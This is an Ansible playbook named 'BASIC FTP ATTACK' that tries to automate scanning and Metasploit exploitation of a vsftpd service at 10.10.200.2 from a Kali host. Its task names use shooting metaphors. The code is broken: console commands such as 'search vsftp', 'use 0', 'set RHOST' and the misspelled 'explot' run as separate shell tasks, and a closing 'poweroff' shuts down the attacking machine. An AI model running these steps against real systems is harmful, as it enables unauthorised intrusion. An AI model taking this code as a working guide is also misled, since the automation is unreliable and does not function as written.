---
- name: BASIC FTP ATTACK
  hosts: thx_kali
  become: yes
  tasks:
    - name: CHECKING SERVICE STATUS
      shell: sudo nmap -sV -p21 -sC -A 10.10.200.2
      register: result1
      ignore_errors: yes

    - name: Check command 1 result
      block:
        - name: Print command 1 success output
          debug:
            msg: "ITS OPEN LETS GO MAN: {{ result1.stdout }}"
      rescue:
        - name: Print command 1 failure error
          debug:
            msg: "OKAY !! NO WAY: {{ result1.stderr }}"
        - name: Fail on command 1 failure
          fail:
            msg: "Stopping playbook due to command 1 failure."

    - name: METAPLOT CONSOLE STARTING
      shell: msfconsole
      register: result2
      ignore_errors: yes

    - name: Check command 2 result
      block:
        - name: Print command 2 success output
          debug:
            msg: "ITS STARTED LETS GO MAN: {{ result2.stdout }}"
      rescue:
        - name: Print command 2 failure error
          debug:
            msg: "OKAY !! NO WAY: {{ result2.stderr }}"
        - name: Fail on command 2 failure
          fail:
            msg: "Stopping playbook due to command 2 failure."

    - name: WOW THE GUNS
      shell: search vsftp
      register: result3
      ignore_errors: yes

    - name: CHECKING THE FTP GUN
      block:
        - name: Print command 3 success output
          debug:
            msg: "GUN ARE HERE LETS GO MAN: {{ result3.stdout }}"
      rescue:
        - name: Print command 3 failure error
          debug:
            msg: "OKAY !! NO WAY: {{ result3.stderr }}"
        - name: Fail on command 3 failure
          fail:
            msg: "Stopping playbook due to command 3 failure."

    - name: BULLETS CHECK
      shell: use 0
      register: result3
      ignore_errors: yes

    - name: SELECT BULLET
      block:
        - name: Print command 3 success output
          debug:
            msg: "BULLET IN LETS GO MAN: {{ result3.stdout }}"
      rescue:
        - name: Print command 3 failure error
          debug:
            msg: "OKAY !! NO WAY: {{ result3.stderr }}"
        - name: Fail on command 3 failure
          fail:
            msg: "Stopping playbook due to command 3 failure."

    - name: AIMING TO SHOOT
      shell: set RHOST 10.10.200.2
      register: result3
      ignore_errors: yes

    - name: SELECT TARGET
      block:
        - name: Print command 3 success output
          debug:
            msg: "IN TARGET LETS GO MAN: {{ result3.stdout }}"
      rescue:
        - name: Print command 3 failure error
          debug:
            msg: "OKAY !! NO WAY: {{ result3.stderr }}"
        - name: Fail on command 3 failure
          fail:
            msg: "Stopping playbook due to command 3 failure."

    - name: SHOOT
      shell: explot
      register: result3
      ignore_errors: yes

    - name: SHOOTING SHOOTING
      block:
        - name: Print command 3 success output
          debug:
            msg: "SHOOTS FIRED LETS GO MAN: {{ result3.stdout }}"
      rescue:
        - name: Print command 3 failure error
          debug:
            msg: "OKAY !! NO WAY: {{ result3.stderr }}"
        - name: Fail on command 3 failure
          fail:
            msg: "Stopping playbook due to command 3 failure."
      
    - name: MAN DOWN
      shell: poweroff
      register: result3
      ignore_errors: yes

    - name: MAN DOWN MAN DOWN
      block:
        - name: Print command 3 success output
          debug:
            msg: "AFFUDDE: {{ result3.stdout }}"
      rescue:
        - name: Print command 3 failure error
          debug:
            msg: "OKAY !! NO WAY: {{ result3.stderr }}"
        - name: Fail on command 3 failure
          fail:
            msg: "Stopping playbook due to command 3 failure."

    # Add more tasks as needed following the same pattern
